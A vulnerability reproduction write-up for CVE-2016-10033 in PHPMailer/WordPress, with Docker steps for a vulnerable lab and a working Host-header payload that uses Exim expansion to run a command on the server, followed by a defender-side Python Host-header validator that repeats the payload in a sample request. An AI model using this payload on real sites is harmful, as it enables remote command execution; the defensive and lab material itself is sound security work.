CVE-2016-10033

Affected versions

WordPress <= 4.7.1, PHPMailer < 5.2.18

Install Docker on Ubuntu

apt-get install docker docker-compose docker.io

Pull the image locally

$ docker pull medicean/vulapps:w_wordpress_6

Start the environment

$ docker run -d -p 80:80 medicean/vulapps:w_wordpress_6

Reproduction steps

http://yourip/wp-login.php?action=lostpassword

Enter admin as the username, submit the form, and capture the request with Burp.

Change the Host: header to:

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)

Response:

Check the generated txt file

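The payload above reaches the mailer through the Host header, which WordPress copies into the sender address of the password-reset mail. A defender-side check, added here as an example that is not part of the original write-up, rejects any Host value that is not a syntactically valid hostname before the request reaches the application; the function names, marker list and the two sample requests are constructed for this example.

```python
import re

# Strict Host header syntax: RFC 1123 hostname labels (an IPv4 literal fits the
# same label grammar) plus an optional :port. IPv6 literals are out of scope here.
HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*"
    r"(?::\d{1,5})?$",
    re.IGNORECASE,
)

# Substrings that never belong in a hostname but appear in the Exim expansion
# payload reproduced above: ${...} expansion items, sendmail option switches and
# the parentheses/quotes used to smuggle them through address parsing.
INJECTION_MARKERS = ("${", "}", " -", "(", ")", '"', "'")


def parse_headers(raw_request: str) -> dict:
    """Return a lower-cased header-name -> value map from a raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:       # skip the request line
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return headers


def check_host_header(raw_request: str) -> dict:
    """Classify the Host header: valid hostname, injection attempt, or malformed."""
    host = parse_headers(raw_request).get("host")
    if host is None:
        return {"host": None, "valid": False, "reason": "missing"}
    if any(marker in host for marker in INJECTION_MARKERS):
        return {"host": host, "valid": False, "reason": "injection-markers"}
    if not HOST_RE.match(host):
        return {"host": host, "valid": False, "reason": "not-a-hostname"}
    return {"host": host, "valid": True, "reason": "ok"}


# Constructed sample requests: a normal lost-password POST and the same request
# carrying the Host value from the reproduction above.
BENIGN = ("POST /wp-login.php?action=lostpassword HTTP/1.1\r\n"
          "Host: blog.example.com\r\n\r\nuser_login=admin&wp-submit=Get+New+Password")
MALICIOUS = ("POST /wp-login.php?action=lostpassword HTTP/1.1\r\n"
             "Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin"
             "${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}"
             "${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)"
             "\r\n\r\nuser_login=admin")
```

Run the check in a reverse proxy or WAF rule rather than inside WordPress, so a rejected request never reaches wp-login.php at all.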
References

先知